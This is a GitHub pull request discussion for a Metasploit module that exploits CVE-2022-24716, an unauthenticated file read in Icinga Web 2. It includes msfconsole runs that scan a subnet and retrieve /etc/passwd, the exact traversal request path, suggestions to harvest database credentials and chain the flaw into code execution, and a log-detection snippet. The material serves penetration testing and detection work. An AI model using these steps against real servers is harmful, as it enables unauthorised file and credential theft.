
Icinga Web 2 Arbitrary File Read (CVE-2022-24716) #17915

Merged
merged 5 commits into from May 3, 2023

Conversation

h00die
Contributor

@h00die h00die commented Apr 21, 2023

This PR adds a module to exploit CVE-2022-24716, an unauthenticated absolute path remote file read in Icinga Web 2.

Verification

  • Install the application
  • Start msfconsole
  • Do: use auxiliary/scanner/http/icinga_static_library_file_directory_traversal
  • Do: set rhosts [ip]
  • Do: set file [file]
  • Do: run
  • You should be able to retrieve a file

@bwatters-r7 bwatters-r7 self-assigned this Apr 24, 2023
@bwatters-r7
Contributor

Testing

msf6 auxiliary(scanner/http/icinga_static_library_file_directory_traversal) > show options

Module options (auxiliary/scanner/http/icinga_static_library_file_directory_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   File       /etc/passwd      yes       File to retrieve
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.5.134.1/24    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI of the Icinga Application
   THREADS    16               yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/http/icinga_static_library_file_directory_traversal) > run

[*] Scanned  27 of 256 hosts (10% complete)
[*] Scanned  52 of 256 hosts (20% complete)
[*] Scanned  77 of 256 hosts (30% complete)
[*] Scanned 103 of 256 hosts (40% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[+] root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

[+] /etc/passwd saved to /home/tmoose/.msf4/loot/20230424145659_default_10.5.134.153_icingafile_843078.txt
[*] Scanned 156 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 232 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/icinga_static_library_file_directory_traversal) > 

@bwatters-r7 bwatters-r7 removed their assignment May 2, 2023
@gwillcox-r7 gwillcox-r7 self-assigned this May 2, 2023
@gwillcox-r7
Contributor

gwillcox-r7 commented May 2, 2023

Given that GHSA-5p3f-rh28-8frw mentions rotating the database credentials I'd also reckon it might be an idea to update this module to allow grabbing the creds from the target and save those into the Metasploit database for later cracking?

Otherwise module looks good, below are some thoughts for future improvement:

According to https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/ you should be able to combine this with CVE-2022-24715 to get RCE on the target. I'd be happy to update this later and land this module as is, or explore this further if you don't have the time, but something to consider 👍

@gwillcox-r7
Contributor

Hmm odd the default config you have doesn't work. A GET request to /lib/icinga/icinga-php-thirdparty/etc/icinga2/icinga2.conf results in a 404. Requesting /lib/icinga/icinga-php-thirdparty/etc/passwd works fine though.
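
The request pattern described above (an absolute path appended to the /lib/icinga/icinga-php-thirdparty/ static library route) is straightforward to pick out of web server access logs. The following is an added example and is not code from this PR or from Metasploit; the log lines are constructed, and the set of "sensitive root" directory names used to separate a system file from a library asset is a heuristic assumption:

```python
# Added example (not part of the PR or the Metasploit module): flag access-log
# entries that use the Icinga Web 2 static library route to request an absolute
# system path instead of a library asset (the CVE-2022-24716 request shape).
import re
from urllib.parse import unquote

# Constructed sample lines in Apache/nginx combined log format.
SAMPLE_LOG = """\
192.0.2.10 - - [02/May/2023:15:40:51 +0000] "GET /icingaweb2/dashboard HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [02/May/2023:15:40:52 +0000] "GET /lib/icinga/icinga-php-thirdparty/vendor/app.js HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.7 - - [02/May/2023:15:40:53 +0000] "GET /lib/icinga/icinga-php-thirdparty/etc/passwd HTTP/1.1" 200 1400 "-" "curl/7.88"
198.51.100.7 - - [02/May/2023:15:40:54 +0000] "GET /lib/icinga/icinga-php-thirdparty/etc%2Ficinga2%2Ficinga2.conf HTTP/1.1" 404 200 "-" "curl/7.88"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The route shown on this page is /lib/icinga/<library>/<file>.
LIBRARY_PREFIX = "/lib/icinga/"
# Heuristic assumption: a library asset never starts at one of these roots.
SENSITIVE_ROOTS = {"etc", "proc", "root", "home", "var", "usr", "opt", "tmp"}


def is_library_file_read(raw_path: str) -> bool:
    """True if the request path asks the library route for a system file."""
    decoded = unquote(raw_path.split("?", 1)[0])  # undo %2F and friends first
    if not decoded.startswith(LIBRARY_PREFIX):
        return False
    segments = decoded[len(LIBRARY_PREFIX):].split("/")
    # segments[0] is the library name; the rest is the file requested inside it.
    remainder = [s for s in segments[1:] if s not in ("", ".")]
    if ".." in remainder:
        return True
    return bool(remainder) and remainder[0] in SENSITIVE_ROOTS


def find_suspicious_requests(log_text: str):
    """Return (client_ip, decoded_path, status) for every flagged log line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_library_file_read(m.group("path")):
            hits.append((m.group("ip"), unquote(m.group("path")), m.group("status")))
    return hits
```

Note that the 404 line is flagged as well: a failed read (as with the Docker image discussed here, where the default config path does not exist) is still evidence of probing.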

@gwillcox-r7
Contributor

The database file should be stored at /etc/icingadb/config.yml however this is not set up in the Docker image that we install. Similarly the /etc/icinga2/ folder doesn't exist on the Docker image and there is no /etc/icingaweb2/icinga2.conf file either.

@gwillcox-r7
Contributor

Copy of the run to showcase what I mean:

msf6 > use auxiliary/scanner/http/
Display all 286 possibilities? (y or n)
msf6 > use auxiliary/scanner/http/icinga_static_library_file_directory_traversal 
msf6 auxiliary(scanner/http/icinga_static_library_file_directory_traversal) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(scanner/http/icinga_static_library_file_directory_traversal) > set RPORT 8080
RPORT => 8080
msf6 auxiliary(scanner/http/icinga_static_library_file_directory_traversal) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/icinga_static_library_file_directory_traversal) > set FILE /etc/passwd
FILE => /etc/passwd
msf6 auxiliary(scanner/http/icinga_static_library_file_directory_traversal) > run

[+] root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

[+] /etc/passwd saved to /home/gwillcox/.msf4/loot/20230502154051_default_127.0.0.1_icingafile_675989.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/icinga_static_library_file_directory_traversal) >

@gwillcox-r7
Contributor

@msjenkins-r7 Test this please!

@h00die
Contributor Author

h00die commented May 2, 2023

Hmm odd the default config you have doesn't work. A GET request to /lib/icinga/icinga-php-thirdparty/etc/icinga2/icinga2.conf results in a 404. Requesting /lib/icinga/icinga-php-thirdparty/etc/passwd works fine though.

Correct. The default is the config file location mentioned in the docs. This should be the default as it's the most common case. Unfortunately Docker puts it in a different location, so /etc/passwd is a good alternative.

@gwillcox-r7
Contributor

Hmm odd the default config you have doesn't work. A GET request to /lib/icinga/icinga-php-thirdparty/etc/icinga2/icinga2.conf results in a 404. Requesting /lib/icinga/icinga-php-thirdparty/etc/passwd works fine though.

Correct. The default is the config file location mentioned in the docs. This should be the default as it's the most common case. Unfortunately Docker puts it in a different location, so /etc/passwd is a good alternative.

Let me do a quick update to the docs to account for this then should be good to land 👍

@gwillcox-r7 gwillcox-r7 added the rn-modules release notes for new or majorly enhanced modules label May 3, 2023
@gwillcox-r7 gwillcox-r7 merged commit bf61718 into rapid7:master May 3, 2023
31 checks passed
@gwillcox-r7
Contributor

Release Notes

A new module has been added in for CVE-2022-24716, an unauthenticated arbitrary file read in Icinga Web 2 versions 2.9.0 to 2.9.5 inclusive, and 2.8.0 to 2.8.5 inclusive that can be used to leak sensitive configuration information from a target server.

@h00die h00die deleted the cve-2022-24716 branch May 3, 2023 19:53